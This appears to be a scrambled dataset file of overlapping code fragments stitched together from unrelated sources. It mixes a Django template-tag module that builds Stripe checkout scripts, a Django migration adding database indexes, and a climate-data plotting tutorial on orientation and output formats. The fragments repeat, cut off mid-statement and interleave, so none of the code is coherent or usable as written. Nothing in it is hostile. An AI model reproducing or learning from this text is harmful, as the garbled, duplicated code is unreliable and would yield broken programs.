BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector,", "import template from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import", "_get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html =", "= _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG)) html", "error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector,", "import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector )", ") return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script =", "mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script", "@register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element)", "mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector )", "_get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element =", "\"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId:", "import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe", "stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function", "stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script,", "OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}');", "@register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init(): script = _get_stripe_init_script() element =", "checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def", "}}); }}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return", "'<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session,", "def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script", "\"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function()", "}}); \"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element", "= Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result)", "from django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG =", ") element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector):", "= INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY) return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id,", "_get_stripe_init_script() element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector):", "error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector", "button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector,", "checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag() def stripe_init():", "django_stripe import settings from django_stripe.models import * OPEN_TAG = \"<script>\" CLOSE_TAG = \"</script>\"", "stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session,", "script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return", "def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element =", "= template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script", "return mark_safe(element) @register.simple_tag() def stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector", "\"\"\" register = template.Library() def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def", "return script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, )", "button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, init_script, button_script, CLOSE_TAG))", "element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element", "= _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element", "django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG =", "Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{", "def _get_stripe_import_element(): element = '<script src=\"https://js.stripe.com/v3/\"></script>' return element def _get_stripe_init_script(): script = INIT_TEMPLATE.format(STRIPE_PUBLIC_KEY=settings.PUBLIC_KEY)", "stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library()", "def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script = _get_stripe_button_script(", "= \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{", "@register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element = _get_stripe_import_element() init_script = _get_stripe_init_script() button_script =", "BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element()) @register.simple_tag()", "BUTTON_TEMPLATE = \"\"\" $('{button_selector}').click(function() {{ stripe.redirectToCheckout({{ sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }});", "script def _get_stripe_button_script(checkout_session, button_selector, error_selector): script = BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return", "= BUTTON_TEMPLATE.format( button_selector=button_selector, checkout_session_id=checkout_session.stripe_session_id, error_selector=error_selector, ) return script @register.simple_tag() def stripe_import(): return mark_safe(_get_stripe_import_element())", "from django.utils.safestring import mark_safe from django_stripe import settings from django_stripe.models import * OPEN_TAG", "sessionId: '{checkout_session_id}' }}).then(function (result) {{ $('{error_selector}').html(result.error.message); }}); }}); \"\"\" register = template.Library() def", "stripe_button(checkout_session, button_selector, error_selector): script = _get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG,", "_get_stripe_button_script( checkout_session, button_selector, error_selector ) element = \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag()", "CLOSE_TAG = \"</script>\" INIT_TEMPLATE = \"\"\" var stripe = Stripe('{STRIPE_PUBLIC_KEY}'); \"\"\" BUTTON_TEMPLATE =", "<reponame>itsnamgyu/api-demo from django import template from django.utils.safestring import mark_safe from django_stripe import settings", "= \"\\n\".join((OPEN_TAG, script, CLOSE_TAG)) return mark_safe(element) @register.simple_tag() def stripe_standalone(checkout_session, button_selector, error_selector): import_element =" ]
[]
[ "dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'),", "class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest',", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ]", "operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'), ),", "<gh_stars>100-1000 # Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations,", "('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest',", "] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'),", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations", "= [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ),", "'0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'],", "09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'),", "by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration):", "Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "[ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex(", "models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex(", "= [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'), ), ]", "2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "# Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models", "Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'],", "on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations =", "migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [", "2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist',", "Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class" ]
[ "file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to an existing", "System routines for Mac, DOS, NT, or Posix depending on # the system", "<filename>Packages/Dead/demo/Script/tutorials/orientation_and_output.py # Adapted for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for", "image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to an existing", "command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg', device='jpeg', orientation='p', resolution='1000x1000')", "of the data v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait()", "quick plot of the data v.plot( data ) # Changing plot orientation to", "values. # os - Operation System routines for Mac, DOS, NT, or Posix", "the plot command! v.open() # A quick plot of the data v.plot( data", "format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM", "v.postscript('test.ps') # GIF format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l',", "mainpulate time values. # os - Operation System routines for Mac, DOS, NT,", "miscellaneous routines for # manipulating variables. # time - This module provides various", "# the interpreter and to functions that interact strongly with the interpreter. import", "GhostScript (gs) format # This routine allows the user to save the VCS", "necessary to do this # before issuing the plot command! v.open() # A", "maintained by # the interpreter and to functions that interact strongly with the", "format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine allows", "defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200')", "data set data = cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening", "to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new", "# To change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\"", "device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') #", "cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps file", "an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing", "routine allows the user to save the VCS canvas in one of the", "provides access to some objects used or maintained by # the interpreter and", "# manipulating variables. # time - This module provides various functions to mainpulate", "for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the tuturial #", "Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the default output orientation.", "control System 1D and 2D plotting routines. # cdutil - Climate utilitizes that", "# # Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the default", "vcs, cdms2 as cdms, cdutil, time, os, sys # Open data file: filepath", "Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF format", "- Climate utilitizes that contains miscellaneous routines for # manipulating variables. # time", "postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with", "v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to", "v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows the user to", "- This module provides access to some objects used or maintained by #", "Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) #", "Data Management system accesses gridded data. # vcs - Visualization and control System", "NT, or Posix depending on # the system you're on. # sys -", "to save the VCS canvas in one of the many # GhostScript (gs)", "append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite", "# CGM format - append to an existing cgm file v.cgm('test.cgm', 'a') #", "Operation System routines for Mac, DOS, NT, or Posix depending on # the", "orientation graphics to file # \"Landscape\" is the default output orientation. # ##############################################################", "'p') ############################################################### # GhostScript (gs) format # This routine allows the user to", "not necessary to do this # before issuing the plot command! v.open() #", "prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600')", "for # manipulating variables. # time - This module provides various functions to", "gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm", "you're on. # sys - This module provides access to some objects used", "the modules needed for the tuturial # cdms - Climate Data Management system", "command! v.open() # A quick plot of the data v.plot( data ) #", "before issuing the plot command! v.open() # A quick plot of the data", "System 1D and 2D plotting routines. # cdutil - Climate utilitizes that contains", "VCS: v = vcs.init() # Opening a VCS Canvas - not necessary to", "of the many # GhostScript (gs) file types (also known as devices). To", "vcs.init() # Opening a VCS Canvas - not necessary to do this #", "file v.postscript('test.ps') # GIF format - append landscape orientation gif image v.gif('test.gif', merge='a',", "known as devices). To view other # GhostScript devices, issue the command \"gs", "orientation graphics to file # ############################################################## # Append postscript output to an existing", "VCS Canvas - not necessary to do this # before issuing the plot", "gridded data. # vcs - Visualization and control System 1D and 2D plotting", "output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a", "VCS canvas in one of the many # GhostScript (gs) file types (also", "as devices). To view other # GhostScript devices, issue the command \"gs --help\"", "# before issuing the plot command! v.open() # A quick plot of the", "file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format #", "for the tuturial # cdms - Climate Data Management system accesses gridded data.", "Postscript - overwrite an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf')", "Import the modules needed for the tuturial # cdms - Climate Data Management", "- not necessary to do this # before issuing the plot command! v.open()", "GhostScript devices, issue the command \"gs --help\" at the terminal # prompt. ##############################################################", "resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print", "the system you're on. # sys - This module provides access to some", "system you're on. # sys - This module provides access to some objects", "cdutil - Climate utilitizes that contains miscellaneous routines for # manipulating variables. #", "data ) # Changing plot orientation to \"Portrait\" v.portrait() # To change the", "v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to", "contains miscellaneous routines for # manipulating variables. # time - This module provides", "\"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics", "# Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF", "os - Operation System routines for Mac, DOS, NT, or Posix depending on", "# Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r') # PDF", "device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\"", "# # Saving \"Portrait\" orientation graphics to file # ############################################################## # Append postscript", "\"Portrait\" v.portrait() # To change the orientation back to \"Landscape\" v.landscape() print \"Generating", "other # GhostScript devices, issue the command \"gs --help\" at the terminal #", "types (also known as devices). To view other # GhostScript devices, issue the", "filepath ) # Extract a 3 dimensional data set data = cdmsfile('clt') #", "file with a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif", "interpreter and to functions that interact strongly with the interpreter. import vcs, cdms2", "Posix depending on # the system you're on. # sys - This module", "############################################################## # # Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the", "set data = cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a", "plot orientation to \"Portrait\" v.portrait() # To change the orientation back to \"Landscape\"", "'a') # Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r') #", "'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional data set", "v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with portriat gif image", "file types (also known as devices). To view other # GhostScript devices, issue", "postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF format", "append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format -", "resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ##############################################################", "v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating", "# cdms - Climate Data Management system accesses gridded data. # vcs -", "depending on # the system you're on. # sys - This module provides", "os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open(", "v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This", "used or maintained by # the interpreter and to functions that interact strongly", "format # This routine allows the user to save the VCS canvas in", "and to functions that interact strongly with the interpreter. import vcs, cdms2 as", "allows the user to save the VCS canvas in one of the many", "with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite", "print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file", "# prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l',", "the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif',", "file # \"Landscape\" is the default output orientation. # ############################################################## # Append to", "with a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s)", "orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving", "graphics to file # ############################################################## # Append postscript output to an existing file", "# Opening a VCS Canvas - not necessary to do this # before", "issue the command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg', device='jpeg',", "v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p') #", "(gs) file types (also known as devices). To view other # GhostScript devices,", "portait output to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format", "CGM format - append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated", "2D plotting routines. # cdutil - Climate utilitizes that contains miscellaneous routines for", "sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath", "= vcs.init() # Opening a VCS Canvas - not necessary to do this", "plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving", "Climate Data Management system accesses gridded data. # vcs - Visualization and control", "to file # ############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p')", "accesses gridded data. # vcs - Visualization and control System 1D and 2D", "that interact strongly with the interpreter. import vcs, cdms2 as cdms, cdutil, time,", "issuing the plot command! v.open() # A quick plot of the data v.plot(", "command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256',", "devices, issue the command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example')", "\"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics", "Visualization and control System 1D and 2D plotting routines. # cdutil - Climate", "# Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath )", "sys - This module provides access to some objects used or maintained by", "orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') #", "tuturial # cdms - Climate Data Management system accesses gridded data. # vcs", "routines for Mac, DOS, NT, or Posix depending on # the system you're", "to some objects used or maintained by # the interpreter and to functions", "and control System 1D and 2D plotting routines. # cdutil - Climate utilitizes", "access to some objects used or maintained by # the interpreter and to", "devices). To view other # GhostScript devices, issue the command \"gs --help\" at", "portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing", "format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows the user", "= os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional", "convertcdms.py # Import the modules needed for the tuturial # cdms - Climate", "- overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600')", "# Append to a postscript file v.postscript('test.ps') # Overwrite the existing postscript file", "# defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l',", "orientation='l', geometry='800x600') # CGM format - append to an existing cgm file v.cgm('test.cgm',", "# Saving \"Landscape\" orientation graphics to file # \"Landscape\" is the default output", "= cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a VCS Canvas", "numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the tuturial # cdms", "a VCS Canvas - not necessary to do this # before issuing the", "3 dimensional data set data = cdmsfile('clt') # Initialize VCS: v = vcs.init()", "the data v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait() #", "save the VCS canvas in one of the many # GhostScript (gs) file", "'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format #", "and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot", "1D and 2D plotting routines. # cdutil - Climate utilitizes that contains miscellaneous", "# Changing plot orientation to \"Portrait\" v.portrait() # To change the orientation back", "dimensional data set data = cdmsfile('clt') # Initialize VCS: v = vcs.init() #", "modules needed for the tuturial # cdms - Climate Data Management system accesses", "############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing", "terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack',", "Canvas - not necessary to do this # before issuing the plot command!", "Opening a VCS Canvas - not necessary to do this # before issuing", "\"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file #", "os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional data", "Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # #", "output to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf", "\"gs --help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l'", "cdmsfile = cdms.open( filepath ) # Extract a 3 dimensional data set data", "orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing", "output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file # ############################################################## #", "v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to an existing cgm", "- append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format", "canvas in one of the many # GhostScript (gs) file types (also known", "(gs) format # This routine allows the user to save the VCS canvas", "file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps',", "orientation to \"Portrait\" v.portrait() # To change the orientation back to \"Landscape\" v.landscape()", "# GhostScript (gs) format # This routine allows the user to save the", "an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p')", "time - This module provides various functions to mainpulate time values. # os", "as cdms, cdutil, time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data,", "some objects used or maintained by # the interpreter and to functions that", "to mainpulate time values. # os - Operation System routines for Mac, DOS,", "manipulating variables. # time - This module provides various functions to mainpulate time", "on # the system you're on. # sys - This module provides access", "the default output orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps')", "cdms - Climate Data Management system accesses gridded data. # vcs - Visualization", "# the system you're on. # sys - This module provides access to", "image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format", "to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an", "v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm',", "eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### #", "Extract a 3 dimensional data set data = cdmsfile('clt') # Initialize VCS: v", "'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine", "# Initialize VCS: v = vcs.init() # Opening a VCS Canvas - not", "with the interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys #", "system accesses gridded data. # vcs - Visualization and control System 1D and", "v = vcs.init() # Opening a VCS Canvas - not necessary to do", "the many # GhostScript (gs) file types (also known as devices). To view", "at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612'", "cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to an", "do this # before issuing the plot command! v.open() # A quick plot", "- Visualization and control System 1D and 2D plotting routines. # cdutil -", "data v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait() # To", "issue the command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example') #", "the command \"gs --help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults:", "# PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows", "existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs)", "cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a VCS Canvas -", "Adapted for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the tuturial", "output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file # \"Landscape\" is", "vcs - Visualization and control System 1D and 2D plotting routines. # cdutil", "# os - Operation System routines for Mac, DOS, NT, or Posix depending", "v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r')", 